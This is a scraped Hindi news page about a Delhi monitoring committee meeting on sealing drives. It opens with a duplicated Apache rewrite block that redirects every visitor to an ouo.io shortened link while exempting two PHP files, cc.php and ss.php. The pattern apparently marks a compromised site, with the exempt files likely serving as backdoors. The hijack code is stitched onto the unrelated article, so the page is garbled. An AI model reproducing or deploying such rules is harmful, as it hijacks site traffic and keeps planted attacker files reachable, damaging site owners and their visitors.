
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 560
Nextनई दिल्ली। देश की राजधानी नई दिल्ली में सीलिंग को लेकर आज मॉनिटरिंग कमेटी की बैठक खत्म हो गई। एक घंटे चली मीटिंग पर फिलहाल रोक नहीं लगाई जाएगी। इसके साथ ही मॉनिटरिंग कॉमेटी ने कहा बैठक में दिए गए सुझाव पर विचार किया जाएगा। दिल्ली के मुख्यमंत्री अरविंद केजरीवाल ने आज मीटिंग बुलाई थी। मीटिंग के दौरान कहा गया कि सभी की एकमात्र चिंता है कि सीलिंग से जो अफरातफरी है, उसको मानवीय स्तर पर भी देखना चाहिए। हालांकि मॉनिटरिंग कमेटी ने बैठक के दौरान कुछ नहीं बोला। आप नेता सौरभ भारद्वाज ने कहा कि मॉनिटिरिंग कमेटी ने कहा कि विचार करते हैं। तीनों पार्टी ने एक मत से सीलिंग को रोकने की बात की है।